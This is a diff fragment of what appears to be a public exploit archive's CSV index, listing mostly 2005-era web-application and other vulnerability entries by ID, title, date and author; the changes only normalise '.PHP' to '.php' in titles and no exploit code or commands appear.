- Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0 25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0 @@ -23094,14 +23094,14 @@ id,file,description,date,author,platform,type,port 25954,platforms/php/webapps/25954.txt,"phpauction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 News_File Remote File Include Vulnerability",2005-07-07,"skdaemon porra",php,webapps,0 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 -25957,platforms/php/webapps/25957.txt,"PunBB 1.x Profile.PHP User Profile Edit Module SQL Injection Vulnerability",2005-07-08,"Stefan Esser",php,webapps,0 -25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 SQL.CLS.PHP SQL Injection Vulnerability",2005-07-10,Defa,php,webapps,0 +25957,platforms/php/webapps/25957.txt,"PunBB 1.x Profile.php User Profile Edit Module SQL Injection Vulnerability",2005-07-08,"Stefan Esser",php,webapps,0 +25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 SQL.CLS.php SQL Injection Vulnerability",2005-07-10,Defa,php,webapps,0 25959,platforms/php/webapps/25959.txt,"Spid 1.3 lang_path File Include Vulnerability",2005-07-11,"skdaemon porra",php,webapps,0 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 ppa_root_path File Include Vulnerability",2005-07-10,"skdaemon porra",php,webapps,0 25961,platforms/windows/local/25961.c,"SoftiaCom WMailserver 1.0 - Local Information Disclosure Vulnerability",2005-07-09,fRoGGz,windows,local,0 25962,platforms/asp/dos/25962.xml,"Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability",2005-07-12,"Bryan Sullivan",asp,dos,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injection Vulnerabilities",2005-07-12,"Diabolic Crab",asp,webapps,0 -25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.Login.PHP Privilege Escalation Vulnerability",2005-07-11,"Stefan Lochbihler",php,webapps,0 +25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.Login.php Privilege Escalation Vulnerability",2005-07-11,"Stefan Lochbihler",php,webapps,0 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 ShowErr.ASP Cross-Site Scripting Vulnerability",2005-07-12,rUnViRuS,asp,webapps,0 25966,platforms/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x BTSRV/BTOBEX Remote Command Execution Vulnerability",2005-07-12,"Kevin Finisterre",hardware,remote,0 25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 CTI Manager Remote Denial of Service Vulnerability",2005-07-12,"Jeff Fay",hardware,dos,0 @@ -23127,14 +23127,14 @@ id,file,description,date,author,platform,type,port 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation Vulnerability",2013-06-05,"Core Security",hardware,remote,0 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control Vulnerability",2003-02-13,"David Litchfield",multiple,remote,0 25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow Vulnerability",2005-07-15,"Leon Juranic",windows,remote,0 -25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 Calendar.PHP Cross-Site Scripting Vulnerability",2005-07-15,Lostmon,php,webapps,0 +25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 Calendar.php Cross-Site Scripting Vulnerability",2005-07-15,Lostmon,php,webapps,0 25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 JPEG Image Rendering Unspecified Buffer Overflow Vulnerability",2005-07-15,"Michal Zalewski",windows,dos,0 25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial of Service Vulnerability",2005-07-15,"Michal Zalewski",windows,dos,0 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 Insecure Temporary File Creation Vulnerability",2005-07-18,"Giovanni Delvecchio",linux,local,0 -25994,platforms/php/webapps/25994.txt,"OSCommerce 2.2 Update.PHP Information Disclosure Vulnerability",2005-07-18,"Andrew Hunter",php,webapps,0 +25994,platforms/php/webapps/25994.txt,"OSCommerce 2.2 Update.php Information Disclosure Vulnerability",2005-07-18,"Andrew Hunter",php,webapps,0 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 Nested BBCode URL Tag Script Injection Vulnerability",2005-07-18,"Nick Griffin",php,webapps,0 25996,platforms/php/webapps/25996.txt,"RuubikCMS 1.1.1 - Stored XSS Vulnerability",2013-06-07,expl0i13r,php,webapps,0 -25997,platforms/php/webapps/25997.txt,"tForum b0.9 Member.PHP Cross-Site Scripting Vulnerability",2005-07-18,wannacut,php,webapps,0 +25997,platforms/php/webapps/25997.txt,"tForum b0.9 Member.php Cross-Site Scripting Vulnerability",2005-07-18,wannacut,php,webapps,0 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0 25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer textNode Use-After-Free",2013-06-07,"Scott Bell",windows,remote,0 26001,platforms/java/webapps/26001.txt,"Novell GroupWise 6.5 WebAccess HTML Injection Vulnerability",2005-07-15,"Francisco Amato",java,webapps,0 @@ -23144,24 +23144,24 @@ id,file,description,date,author,platform,type,port 26005,platforms/windows/dos/26005.pl,"Alt-N MDaemon 8.0 IMAP Server CREATE Remote Buffer Overflow Vulnerability",2005-07-19,kcope,windows,dos,0 26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x Unauthorized Report Execution Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26007,platforms/php/webapps/26007.txt,"PHP Ticket System Beta 1 - CSRF Vulnerability",2013-06-07,"Pablo Ribeiro",php,webapps,0 -26293,platforms/php/webapps/26293.txt,"JPortal 2.2.1/2.3.1 Download.PHP SQL Injection Vulnerability",2005-08-21,krasza,php,webapps,0 -26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 Password.PHP SQL Injection Vulnerabililty",2005-08-23,retrogod@aliceposta.it,php,webapps,0 +26293,platforms/php/webapps/26293.txt,"JPortal 2.2.1/2.3.1 Download.php SQL Injection Vulnerability",2005-08-21,krasza,php,webapps,0 +26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 Password.php SQL Injection Vulnerabililty",2005-08-23,retrogod@aliceposta.it,php,webapps,0 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Include Vulnerability",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - CSRF Vulnerability",2013-06-07,"Pablo Ribeiro",php,webapps,0 26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment Local File Inclusion Vulnerability",2013-06-07,metasploit,windows,remote,80 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 10g/ 6i/9i/4.5.10/5.0/6.0.8 Services Unauthorized Form Execution Vulnerability",2005-07-19,"Alexander Kornbrust",multiple,remote,0 -26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 Processform.PHP3 Name Cross-Site Scripting Vulnerability",2005-07-19,rgod,php,webapps,0 -26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 Processform.PHP3 Failed Cross-Site Scripting Vulnerability",2005-07-19,rgod,php,webapps,0 -26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - Auth.PHP SQL Injection Vulnerability",2005-07-20,GHC,php,webapps,0 +26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 Processform.php3 Name Cross-Site Scripting Vulnerability",2005-07-19,rgod,php,webapps,0 +26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 Processform.php3 Failed Cross-Site Scripting Vulnerability",2005-07-19,rgod,php,webapps,0 +26016,platforms/php/webapps/26016.txt,"PHPNews 1.2.x - Auth.php SQL Injection Vulnerability",2005-07-20,GHC,php,webapps,0 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 -26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 Newsearch.PHP Whatdoreplace Cross-Site Scripting Vulnerability",2005-07-21,rgod,php,webapps,0 +26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 Newsearch.php Whatdoreplace Cross-Site Scripting Vulnerability",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ Unauthorized Access Vulnerability",2005-07-25,d.is.evil,hardware,remote,0 -26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.PHP Remote File Include Vulnerability",2005-07-25,lwdz,php,webapps,0 +26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.php Remote File Include Vulnerability",2005-07-25,lwdz,php,webapps,0 26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal Vulnerability",2005-07-25,"Martin O'Neal",linux,remote,0 26025,platforms/php/webapps/26025.txt,"Netquery 3.1 submit.php portnum Parameter XSS",2005-07-25,rgod,php,webapps,0 26026,platforms/php/webapps/26026.txt,"Netquery 3.1 nqgeoip2.php Multiple Parameter XSS",2005-07-25,rgod,php,webapps,0 @@ -23169,12 +23169,12 @@ id,file,description,date,author,platform,type,port 26028,platforms/php/webapps/26028.txt,"Netquery 3.1 nqports.php step Parameter XSS",2005-07-25,rgod,php,webapps,0 26029,platforms/php/webapps/26029.txt,"Netquery 3.1 nqports2.php Multiple Parameter XSS",2005-07-25,rgod,php,webapps,0 26030,platforms/php/webapps/26030.txt,"Netquery 3.1 portlist.php portnum Parameter XSS",2005-07-25,rgod,php,webapps,0 -26031,platforms/php/webapps/26031.txt,"VBZoom Forum 1.11 Show.PHP SQL Injection Vulnerability",2005-07-26,abducter_minds@yahoo.com,php,webapps,0 +26031,platforms/php/webapps/26031.txt,"VBZoom Forum 1.11 Show.php SQL Injection Vulnerability",2005-07-26,abducter_minds@yahoo.com,php,webapps,0 26032,platforms/windows/remote/26032.html,"SPI Dynamics WebInspect 5.0.196 - Cross Application Script Injection Vulnerability",2005-07-26,QQLan@yandex.ru,windows,remote,0 26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 ViewCart.ASP Cross-Site Scripting Vulnerability",2005-07-26,Zinho,asp,webapps,0 -26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 Guestbook.PHP Cross-Site Scripting Vulnerability",2005-07-26,rgod,php,webapps,0 +26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 Guestbook.php Cross-Site Scripting Vulnerability",2005-07-26,rgod,php,webapps,0 26035,platforms/windows/remote/26035.txt,"Advanced Guestbook 2.2/2.3 User-Agent HTML Injection Vulnerability",2005-01-22,Carbonize,windows,remote,0 -26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 Demo.PHP Cross-Site Scripting Vulnerability",2005-07-26,ArCaX-ATH,php,webapps,0 +26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 Demo.php Cross-Site Scripting Vulnerability",2005-07-26,ArCaX-ATH,php,webapps,0 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 results.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 categorysearch.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26039,platforms/php/webapps/26039.txt,"BMForum 3.0 topic.php Multiple Parameter XSS",2005-07-27,Lostmon,php,webapps,0 @@ -23200,9 +23200,9 @@ id,file,description,date,author,platform,type,port 26059,platforms/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps,0 26060,platforms/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 Index.CFM Cross-Site Scripting Vulnerability",2005-08-01,rUnViRuS,cfm,webapps,0 26061,platforms/php/webapps/26061.txt,"PHPFreeNews 1.x Admin Login SQL Injection Vulnerability",2005-08-01,rgod,php,webapps,0 -26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 Admin.PHP SQL Injection Vulnerability",2005-08-01,SVT,php,webapps,0 -26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 Lost_password.PHP Cross-Site Scripting Vulnerability",2005-08-02,"John Cobb",php,webapps,0 -26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 Shop_Display_Products.PHP SQL Injection Vulnerability",2005-08-02,"John Cobb",php,webapps,0 +26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 Admin.php SQL Injection Vulnerability",2005-08-01,SVT,php,webapps,0 +26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 Lost_password.php Cross-Site Scripting Vulnerability",2005-08-02,"John Cobb",php,webapps,0 +26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 Shop_Display_Products.php SQL Injection Vulnerability",2005-08-02,"John Cobb",php,webapps,0 26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 Index.CFM Cross-Site Scripting Vulnerability",2005-08-03,N.N.P,cfm,webapps,0 26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 KS File Arbitrary Python Command Execution Vulnerability",2005-07-31,"Radovan Garabík",cgi,webapps,0 26067,platforms/php/webapps/26067.txt,"Web Content Management validsession.php strRootpath Parameter XSS",2005-08-03,rgod,php,webapps,0 @@ -23210,7 +23210,7 @@ id,file,description,date,author,platform,type,port 26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 Message.ASP Cross-Site Scripting Vulnerability",2005-08-03,basher13,asp,webapps,0 26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 Default.ASP SQL Injection Vulnerability",2005-08-03,basher13,asp,webapps,0 26071,platforms/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 - Cross-Site Scripting Vulnerability",2005-08-04,"Secunia Research",multiple,remote,0 -26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 Index.PHP SQL Injection Vulnerability",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 +26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 Index.php SQL Injection Vulnerability",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 Source Code Disclosure Vulnerability",2013-06-10,LiquidWorm,jsp,webapps,0 26332,platforms/multiple/remote/26332.txt,"Oracle 9 XML DB Cross-Site Scripting Vulnerability",2005-10-07,"Alexander Kornbrust",multiple,remote,0 26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 header.php sitetitle Parameter XSS",2005-10-07,rgod,php,webapps,0 @@ -23218,10 +23218,10 @@ id,file,description,date,author,platform,type,port 26076,platforms/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,hardware,dos,0 26077,platforms/php/webapps/26077.txt,"concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 Logs Unauthorized Access Vulnerability",2005-08-23,rgod,php,webapps,0 -26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 Index.PHP Cross-Site Scripting Vulnerability",2005-09-26,X1ngBox,php,webapps,0 +26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 Index.php Cross-Site Scripting Vulnerability",2005-09-26,X1ngBox,php,webapps,0 26299,platforms/windows/remote/26299.c,"multitheftauto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 -26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 Config.PHP Remote File Include Vulnerability",2005-08-05,anonymous,php,webapps,0 -26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 WCE.Download.PHP Directory Traversal Vulnerability",2005-08-05,anonymous,php,webapps,0 +26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 Config.php Remote File Include Vulnerability",2005-08-05,anonymous,php,webapps,0 +26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 WCE.Download.php Directory Traversal Vulnerability",2005-08-05,anonymous,php,webapps,0 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 dwt_editor.php Multiple Parameter XSS",2005-08-05,Lostmon,php,webapps,0 26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 jax_newsletter.php language Parameter XSS",2005-08-05,Lostmon,php,webapps,0 26083,platforms/php/webapps/26083.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 sign_in.php language Parameter XSS",2005-08-05,Lostmon,php,webapps,0 @@ -23243,7 +23243,7 @@ id,file,description,date,author,platform,type,port 26099,platforms/php/webapps/26099.txt,"FlatNuke 2.5.5 footer.php Multiple Parameter XSS",2005-08-05,rgod,php,webapps,0 26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0 26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal And Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 -26102,platforms/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 Messages.PHP SQL Injection Vulnerability",2005-08-06,almaster,php,webapps,0 +26102,platforms/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 Messages.php SQL Injection Vulnerability",2005-08-06,almaster,php,webapps,0 26103,platforms/php/webapps/26103.txt,"SysCP 1.2.x - Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",php,webapps,0 26104,platforms/php/webapps/26104.html,"Invision Power Board 1.0.3 Attached File Cross-Site Scripting Vulnerability",2005-08-08,V[i]RuS,php,webapps,0 26105,platforms/php/webapps/26105.html,"E107 Website System 0.6 Attached File Cross-Site Scripting Vulnerability",2005-08-08,edward11,php,webapps,0 @@ -23251,12 +23251,12 @@ id,file,description,date,author,platform,type,port 26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 dispbbs.asp page Parameter XSS",2005-08-08,Lostmon,asp,webapps,0 26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 dispuser.asp name Parameter XSS",2005-08-08,Lostmon,asp,webapps,0 26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 boardhelp.asp Multiple Parameter XSS",2005-08-08,Lostmon,asp,webapps,0 -26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 DeleteThread.PHP Cross-Site Scripting Vulnerability",2005-08-08,rgod,php,webapps,0 +26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 DeleteThread.php Cross-Site Scripting Vulnerability",2005-08-08,rgod,php,webapps,0 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 CSS Template Unauthorized Access Vulnerability",2005-08-08,rgod,php,webapps,0 26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 login.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 subscribe.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 -26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - Search.PHP Cross-Site Scripting Vulnerability",2005-08-08,almaster,php,webapps,0 +26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - Search.php Cross-Site Scripting Vulnerability",2005-08-08,almaster,php,webapps,0 26116,platforms/php/webapps/26116.txt,"Chipmunk CMS 1.3 Fontcolor Cross-Site Scripting Vulnerability",2005-08-08,rgod,php,webapps,0 26117,platforms/php/webapps/26117.txt,"FunkBoard 0.66 editpost.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26118,platforms/php/webapps/26118.txt,"FunkBoard 0.66 prefs.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 @@ -23287,7 +23287,7 @@ id,file,description,date,author,platform,type,port 26143,platforms/php/webapps/26143.txt,"ezUpload 2.2 form.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26144,platforms/php/webapps/26144.txt,"PHPTB Topic Board 2.0 index.php mid Parameter SQL Injection",2005-08-10,abducter_minds@yahoo.com,php,webapps,0 26145,platforms/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service Vulnerability",2005-08-10,"Piotr Chytla",multiple,dos,0 -26146,platforms/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 Index.PHP Cross-Site Scripting Vulnerability",2005-08-10,dyn0,php,webapps,0 +26146,platforms/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 Index.php Cross-Site Scripting Vulnerability",2005-08-10,dyn0,php,webapps,0 26147,platforms/php/webapps/26147.txt,"MyBulletinBoard RC4 index.php Username Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26148,platforms/php/webapps/26148.txt,"MyBulletinBoard RC4 member.php Multiple Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26149,platforms/php/webapps/26149.txt,"MyBulletinBoard RC4 polls.php polloptions Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 @@ -23296,11 +23296,11 @@ id,file,description,date,author,platform,type,port 26152,platforms/osx/remote/26152.txt,"Apple Mac OS X 10.4 Weblog Server Cross-Site Scripting Vulnerabilities",2005-08-15,"Donnie Werner",osx,remote,0 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 index.php Multiple Parameter XSS",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog Userslist.ASP SQL Injection Vulnerability",2005-08-16,trueend5,asp,webapps,0 -26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 Index.PHP SQL Injection Vulnerability",2005-08-16,"John Cobb",php,webapps,0 +26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 Index.php SQL Injection Vulnerability",2005-08-16,"John Cobb",php,webapps,0 26156,platforms/asp/webapps/26156.txt,"CPaint 1.3 xmlhttp Request Input Validation Vulnerability",2005-08-16,"Thor Larholm",asp,webapps,0 -26157,platforms/php/webapps/26157.txt,"ECW Shop 6.0.2 Index.PHP Cross-Site Scripting Vulnerability",2005-08-16,"John Cobb",php,webapps,0 -26158,platforms/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 Index.PHP HTML Injection Vulnerability",2005-08-16,"John Cobb",php,webapps,0 -26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - SearchResults.PHP Multiple SQL Injection Vulnerabilities",2005-08-17,h4cky,php,webapps,0 +26157,platforms/php/webapps/26157.txt,"ECW Shop 6.0.2 Index.php Cross-Site Scripting Vulnerability",2005-08-16,"John Cobb",php,webapps,0 +26158,platforms/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 Index.php HTML Injection Vulnerability",2005-08-16,"John Cobb",php,webapps,0 +26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - SearchResults.php Multiple SQL Injection Vulnerabilities",2005-08-17,h4cky,php,webapps,0 26160,platforms/php/webapps/26160.txt,"PHPFreeNews 1.40 NewsCategoryForm.php NewsMode Parameter XSS",2005-08-17,h4cky,php,webapps,0 26161,platforms/php/webapps/26161.txt,"PHPFreeNews 1.40 - SearchResults.php Multiple Parameter XSS",2005-08-17,h4cky,php,webapps,0 26162,platforms/php/webapps/26162.txt,"PHPTB Topic Board 2.0 admin_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 @@ -23312,25 +23312,25 @@ id,file,description,date,author,platform,type,port 26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 Site Parameter Directory Traversal Vulnerability",2005-08-18,matrix_killer,php,webapps,0 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 login.php course Parameter XSS",2005-08-18,matrix_killer,php,webapps,0 -26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.PHP Arbitrary Command Execution Vulnerability",2005-08-18,rgod,php,webapps,0 +26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.php Arbitrary Command Execution Vulnerability",2005-08-18,rgod,php,webapps,0 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0 26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,metasploit,windows,remote,0 -26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x ModCP.PHP SQL Injection Vulnerability",2005-08-20,[R],php,webapps,0 +26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x ModCP.php SQL Injection Vulnerability",2005-08-20,[R],php,webapps,0 26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 journal.php m Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26179,platforms/php/webapps/26179.txt,"Land Down Under 800/801 list.php Multiple Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26180,platforms/php/webapps/26180.txt,"Land Down Under 800/801 forums.php Multiple Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26181,platforms/php/webapps/26181.txt,"Land Down Under 800 journal.php w Parameter XSS",2005-08-20,bl2k,php,webapps,0 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 index.php Multiple Parameter XSS",2005-08-20,bl2k,php,webapps,0 -26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 Browse.PHP Cross-Site Scripting Vulnerability",2005-08-22,bl2k,php,webapps,0 +26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 Browse.php Cross-Site Scripting Vulnerability",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - Multiple SQL Injection Vulnerabilities",2005-08-22,phuket,php,webapps,0 26185,platforms/osx/local/26185.txt,"Apple Mac OS X 10.4 dsidentity Directory Services Account Creation and Deletion Vulnerability",2005-08-15,"Neil Archibald",osx,local,0 26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities",2005-08-22,"James Bercegay",php,webapps,0 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b Comments Module moderate Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b user.php htmltext Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 -26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL-viewdownload.PHP SQL Injection Vulnerability",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 +26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL-viewdownload.php SQL Injection Vulnerability",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 Unauthorized Access Vulnerability",2005-08-23,rgod,php,webapps,0 26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Include Vulnerabilities",2005-08-23,rgod,php,webapps,0 